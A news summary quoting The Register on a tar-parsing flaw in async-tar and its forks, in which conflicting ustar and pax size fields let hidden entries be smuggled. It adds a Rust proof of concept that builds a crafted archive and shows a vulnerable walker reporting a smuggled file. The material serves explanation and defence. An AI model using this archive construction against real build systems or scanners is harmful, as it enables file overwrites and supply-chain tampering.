
"The tar format can support both ustar (Unix Standard TAR) and pax headers; the latter was added as an extension to tar decades ago. When a file entry has both ustar and pax headers, the code advances the stream position based on the ustar size, often zero, rather than the pax size, which should override it. This means it may interpret file content as a tar header, enabling smuggled files."
"The normal disclosure pattern for a vulnerability is that maintainers are informed in advance to create patches before the issue is widely known. In this case, though, there are several important forks of async-tar. The version used by uv is astral-tokio-tar, which, the readme states, "is a fork of edera-dev/tokio-tar, which was a fork of vorot93/tokio-tar, which was a fork of dignifiedquire/async-tar, which is based on alexcrichton/tar-rs.""
"The fork called tokio-tar is the most popular, according to crates.io, with over 7 million downloads, but the Edera team had problems contacting the maintainers of both tokio-tar and async-tar, because "neither project had a SECURITY.md or public contact method," resorting to what it called social engineering and community sleuthing to find the right people. The outcome is that while both async-tar and astral-tokio-tar have been patched, tokio-tar has not."
A header-parsing vulnerability in async-tar lets an attacker hide extra files in a tar archive when an entry carries both a ustar header and a pax extended header. The parser advances the stream by the ustar size field, often zero, instead of the pax size record that should override it, so the entry's content is read as the next tar header and a smuggled entry emerges that a correct parser never sees. Exploitation can enable file overwriting, supply-chain attacks via build systems and package managers, and bypass of bill-of-materials scanning, because two tar implementations can disagree about which entries the same archive contains. Multiple forks exist; async-tar and astral-tokio-tar have been patched, but the widely downloaded tokio-tar fork remains unpatched and appears unmaintained.
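The header-advance bug described in the first excerpt and in the summary above, as an added example that is not code from async-tar, any of its forks or The Register: a minimal, standard-library-only Rust tar walker run over a constructed archive. The entry names (innocent.txt, smuggled.txt), the `honor_pax` flag and all function names are assumptions made for illustration; the "vulnerable" mode models the described behaviour of skipping by the ustar size field rather than the pax `size` record, not the exact async-tar code path.

```rust
// Added example, not async-tar code: a minimal tar walker showing why a reader
// must advance by the pax `size` record, not the ustar size field. Std only.
const BLOCK: usize = 512;
/// Round a payload length up to the next 512-byte block boundary.
fn padded(n: u64) -> usize { (n as usize + BLOCK - 1) / BLOCK * BLOCK }

/// Build a ustar header with a valid checksum (POSIX layout, needed fields only).
fn ustar_header(name: &str, size: u64, typeflag: u8) -> [u8; BLOCK] {
    let mut h = [0u8; BLOCK];
    h[..name.len()].copy_from_slice(name.as_bytes());
    h[124..135].copy_from_slice(format!("{:011o}", size).as_bytes());
    h[148..156].copy_from_slice(b"        "); // checksum field counts as 8 spaces
    h[156] = typeflag;
    h[257..263].copy_from_slice(b"ustar\0");
    h[263..265].copy_from_slice(b"00");
    let sum: u32 = h.iter().map(|&b| b as u32).sum();
    h[148..155].copy_from_slice(format!("{:06o}\0", sum).as_bytes());
    h[155] = b' ';
    h
}

/// Parse a NUL- or space-terminated octal field (no leading spaces expected).
fn parse_octal(field: &[u8]) -> u64 {
    let digits = field.iter().take_while(|&&b| b != 0 && b != b' ');
    digits.filter(|&&b| (b'0'..=b'7').contains(&b)).fold(0, |acc, &b| acc * 8 + (b - b'0') as u64)
}

/// Header checksum check; note that the smuggled header below passes it too.
fn checksum_ok(h: &[u8]) -> bool {
    let sum: u64 = h.iter().enumerate().map(|(i, &b)| if (148..156).contains(&i) { 32 } else { b as u64 }).sum();
    parse_octal(&h[148..156]) == sum
}

/// One pax record, "<total length> key=value\n", the length counting itself.
fn pax_record(key: &str, value: &str) -> Vec<u8> {
    let body = key.len() + value.len() + 3; // ' ', '=', '\n'
    let len = (1usize..).find(|n| n.to_string().len() + body == *n).unwrap();
    format!("{} {}={}\n", len, key, value).into_bytes()
}

/// Extract the `size` record from pax extended-header data, if present.
fn pax_size(data: &[u8]) -> Option<u64> {
    String::from_utf8_lossy(data).lines()
        .find_map(|rec| rec.splitn(2, ' ').nth(1)?.strip_prefix("size=")?.parse().ok())
}

/// Constructed archive: a pax header declaring size=1024 for "innocent.txt", a
/// ustar header whose own size field says 0, and 1024 bytes of content that are
/// themselves a complete, checksum-valid entry for "smuggled.txt".
fn build_smuggled_archive() -> Vec<u8> {
    let mut content = Vec::new();
    content.extend_from_slice(&ustar_header("smuggled.txt", 6, b'0'));
    content.extend_from_slice(b"pwned\n");
    content.resize(padded(content.len() as u64), 0);
    let pax = pax_record("size", &content.len().to_string());
    let mut archive = Vec::new();
    archive.extend_from_slice(&ustar_header("PaxHeader/innocent.txt", pax.len() as u64, b'x'));
    archive.extend_from_slice(&pax);
    archive.resize(padded(archive.len() as u64), 0);
    archive.extend_from_slice(&ustar_header("innocent.txt", 0, b'0'));
    archive.extend_from_slice(&content);
    archive.extend_from_slice(&[0u8; 2 * BLOCK]); // end-of-archive marker
    archive
}

/// Walk the archive, returning (name, size used to advance) per regular entry.
/// `honor_pax = false` models the bug: the ustar size field decides how far to
/// skip even when the preceding pax header carries an overriding `size` record.
fn list_entries(archive: &[u8], honor_pax: bool) -> Vec<(String, u64)> {
    let (mut out, mut pos, mut pending_pax_size) = (Vec::new(), 0usize, None::<u64>);
    while pos + BLOCK <= archive.len() {
        let h = &archive[pos..pos + BLOCK];
        if h.iter().all(|&b| b == 0) || !checksum_ok(h) {
            break; // end-of-archive marker, or not a header at all
        }
        pos += BLOCK;
        let ustar_size = parse_octal(&h[124..136]);
        if h[156] == b'x' {
            // A pax header's own length is always carried in its ustar size field.
            let end = (pos + ustar_size as usize).min(archive.len());
            pending_pax_size = pax_size(&archive[pos..end]);
            pos += padded(ustar_size);
            continue;
        }
        let size = match (honor_pax, pending_pax_size.take()) {
            (true, Some(s)) => s,
            _ => ustar_size, // the bug: the pax `size` is ignored when skipping
        };
        let name_end = h[..100].iter().position(|&b| b == 0).unwrap_or(100);
        out.push((String::from_utf8_lossy(&h[..name_end]).into_owned(), size));
        pos += padded(size);
    }
    out
}

fn main() {
    let archive = build_smuggled_archive();
    println!("vulnerable: {:?}", list_entries(&archive, false));
    println!("fixed:      {:?}", list_entries(&archive, true));
}
```

Running it prints two listings of the same bytes: the vulnerable walk skips zero bytes after innocent.txt, lands on the content, and reports a second, fully checksum-valid entry smuggled.txt; the corrected walk skips the 1024 bytes the pax record declares and reaches the end-of-archive marker. That disagreement between two parsers over one archive is what lets a hidden entry slip past a scanner that uses one implementation while an extractor uses the other.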
Read at The Register